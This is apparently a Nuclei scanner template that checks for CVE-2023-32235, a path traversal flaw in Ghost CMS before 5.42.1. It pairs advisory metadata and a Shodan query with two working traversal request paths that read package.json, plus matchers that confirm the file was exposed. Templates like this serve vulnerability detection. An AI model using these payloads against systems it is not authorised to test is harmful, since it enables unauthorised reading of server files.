60 lines
1.8 KiB
YAML
60 lines
1.8 KiB
YAML
id: CVE-2023-32235
|
|
|
|
info:
|
|
name: Ghost CMS < 5.42.1 - Path Traversal
|
|
author: j3ssie
|
|
severity: high
|
|
description: |
|
|
Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js.
|
|
remediation: Fixed in version 5.42.1
|
|
reference:
|
|
- https://github.com/advisories/GHSA-wf7x-fh6w-34r6
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-32235
|
|
- https://github.com/TryGhost/Ghost/commit/378dd913aa8d0fd0da29b0ffced8884579598b0f
|
|
- https://github.com/TryGhost/Ghost/compare/v5.42.0...v5.42.1
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-32235
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00998
|
|
epss-percentile: 0.81899
|
|
cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: ghost
|
|
product: ghost
|
|
framework: node.js
|
|
shodan-query: http.component:"Ghost"
|
|
tags: cve,cve2023,lfi,ghostcms
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/assets/built%2F..%2F..%2F/package.json"
|
|
- "{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"name"'
|
|
- '"version"'
|
|
- '"ghost"'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502210092a62dc9d47821a45b60583a002e3750f3f8e9d8770a4b0d5dfd003a6241ea2a022047a3b9f2189b0f9e1bfe1dff63e95682843e34c06296ee56bb3b51408f4394e5:922c64590222798bb761d5b6d8e72950
|